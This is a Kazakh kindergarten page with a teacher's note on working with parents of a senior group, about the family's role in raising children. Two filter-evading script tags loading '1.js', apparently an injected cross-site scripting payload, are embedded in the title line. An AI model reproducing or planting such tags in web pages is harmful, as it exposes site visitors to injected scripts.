«Балдәурен» ересек тобының ата-аналармен жұмыс түрі « Күзгі орманға саяхат»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.10.2023

Мақсаты: Балабақшамен ата-ана арасындағы қарым-қатынасты күшейте отырып, отбасында балаға ата-ананың ықпалын арттыру.

Бала тәрбиесінде ата-ананың алатын орнының ерекше екенін түсіндіру; ата-ана бойына  өздерін педагог ретінде қарауға  қызығушылықтарын дамыту.                          

     Отбасы адамзат бесігін  тербеткен ұя болса, баланың бас ұстазы-ата-ана. «Балапан ұяда не көрсе, ұшқанда соны іледі» деген ата-бабаларымыздан қалған асыл сөздің сырына үңілер болсақ, бала әкеден ақыл, анадан мейірім  алады. Ата-анаға баладан жақсы ешкім жоқ. Мектепке дейінгі ұйымдардың басты мақсаты – отбасында баланы тәрбиелеуге кәсіптік көмек беру, оны ауыстырмай, тәрбиелік функцияларын жүзеге асыруды толықтыру және қамтамасыз ету арқылы жүргізу.

Бұл:                                                                                                                            

- баланың қызығушылығы мен қажеттілігін дамыту;                                                            

- бала тәрбиесіндегі тұрақты өзгеретін жағдайларда ата-аналар арасындағы міндеттер мен жауапкершіліктерді бөлу;                                                                    

 - отбасы өмірінің бейнесін жасау, отбасылық дәстүрлерді формалау;                                       

- баланың жекелігін қабылдау және түсіну, балаға бірден-бір жеке тұлға ретінде сену және сыйлау.

Ата—анамен баланың жасаған қадамы ертеңгі тұлға қалыптасуына үлкен әсер ететінін түсінді.

Ата- анамен бірігіп жұмыс жасау тәрбиешінің де жұмысын нығайта түседі.

 

Тәрбиеші: Каиржанова О.Х.

 

Просмотров: 446


Пікір қосу



Деректерді қолтаңбаға қосу